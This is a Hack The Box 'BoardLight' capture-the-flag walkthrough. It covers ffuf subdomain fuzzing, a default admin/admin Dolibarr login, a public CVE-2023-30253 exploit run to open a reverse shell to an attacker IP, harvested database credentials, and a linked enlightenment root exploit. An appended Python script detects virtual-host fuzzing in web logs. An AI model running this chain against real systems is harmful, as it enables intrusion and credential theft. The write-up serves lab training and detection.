BoardLight
https://app.hackthebox.com/machines/BoardLight
Victim IP: 10.10.11.11
Attacker IP: 10.10.16.6
References: https://github.com/alvaroogs013/WriteUp-HTB-BoardLight
https://loghmariala.github.io/posts/BoardLight/
https://blog.csdn.net/m0_52742680/article/details/139233464
https://blog.csdn.net/tanbinn/article/details/139576519
Port scan
Directory scan, which also found nothing useful
Found Board.htb on the web page
Add it to the hosts file
Subdomain brute force
ffuf -u http://board.htb -t 200 -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host:FUZZ.board.htb" -fw 6243
Add it to the hosts file
Dolibarr 17.0.0
Found the default password
admin/admin
Login succeeded
Reverse shell
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
python exploit.py http://crm.board.htb admin admin 10.10.16.4 1111
Found data
/html/crm.board.htb/htdocs/conf/conf.php
dolibarrowner/serverfun2$2023!!
Connect over SSH
Privilege escalation
Upload linpeas.sh
linpeas found the enlightenment privilege escalation
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
Got root
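From the defender's side, the subdomain brute force step above is the noisiest part of this chain: ffuf's -fw filter only hides responses on the client, so the web server still logs every guessed Host value. The following is an added example, not part of the original write-up, that flags clients probing many unconfigured hostnames; the log format, the sample lines and the threshold are assumptions.

```python
import re
from collections import defaultdict

# Assumed Apache LogFormat (not from the write-up):
#   "%h %t \"%{Host}i\" \"%r\" %>s %b"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<ts>[^\]]+)\] "(?P<host>[^"]*)" '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def find_vhost_fuzzers(lines, base_domain, known_hosts, min_unknown=5):
    """Return {client_ip: sorted unknown hostnames} for every client that
    requested at least `min_unknown` distinct hostnames under `base_domain`
    that are not configured virtual hosts."""
    suffix = "." + base_domain.lower()
    known = {h.lower() for h in known_hosts}
    unknown = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line does not match the assumed format
        # Normalise the Host header: lower-case, drop port and trailing dot.
        host = m["host"].lower().split(":")[0].rstrip(".")
        if host.endswith(suffix) and host not in known:
            unknown[m["client"]].add(host)
    return {ip: sorted(h) for ip, h in unknown.items() if len(h) >= min_unknown}


def build_sample_log():
    """Constructed sample lines: one client guessing subdomains, one normal user."""
    ts = "01/Jan/2024:10:00:00 +0000"  # constructed timestamp
    guesses = ("www", "mail", "dev", "test", "admin", "crm")
    lines = [f'10.10.16.6 [{ts}] "{w}.board.htb" "GET / HTTP/1.1" 200 15949'
             for w in guesses]
    lines += [
        f'192.0.2.10 [{ts}] "board.htb" "GET / HTTP/1.1" 200 15949',
        f'192.0.2.10 [{ts}] "crm.board.htb:80" "GET / HTTP/1.1" 200 6360',
        f'192.0.2.10 [{ts}] "crn.board.htb" "GET / HTTP/1.1" 200 15949',  # one typo
    ]
    return lines


if __name__ == "__main__":
    hits = find_vhost_fuzzers(build_sample_log(), "board.htb",
                              {"board.htb", "crm.board.htb"})
    for ip, hosts in hits.items():
        print(f"{ip} probed {len(hosts)} unknown vhosts: {', '.join(hosts)}")
```

In production the threshold would be applied per time window, and the default virtual host should log the Host header so these requests are visible at all.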
Originally published on the WeChat official account (王之暴龙战神): BoardLight